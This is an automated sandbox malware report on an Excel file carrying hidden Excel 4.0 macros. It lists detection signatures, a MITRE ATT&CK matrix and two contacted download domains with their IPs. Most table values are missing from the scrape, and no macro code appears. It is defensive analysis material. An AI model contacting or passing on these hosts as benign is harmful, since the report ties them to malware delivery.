Windows Analysis Report statistic-1496367785.xls
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | ||
JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | File opened: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Yara detected hidden Macro 4.0 in Excel | Show sources |
Source: | File source: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting2 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
38% | Virustotal | Browse | ||
35% | ReversingLabs | Document-Excel.Trojan.Woreflint |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse | ||
1% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
academy.haleemcampus.com | 108.179.232.80 | true | false |
| unknown |
psq.com.mx | 162.241.2.112 | true | false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
108.179.232.80 | academy.haleemcampus.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
162.241.2.112 | psq.com.mx | United States | 26337 | OIS1US | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 441923 |
Start date: | 29.06.2021 |
Start time: | 17:46:18 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 32s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | statistic-1496367785.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLS@5/7@2/2 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
108.179.232.80 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
162.241.2.112 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
psq.com.mx | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
academy.haleemcampus.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
OIS1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
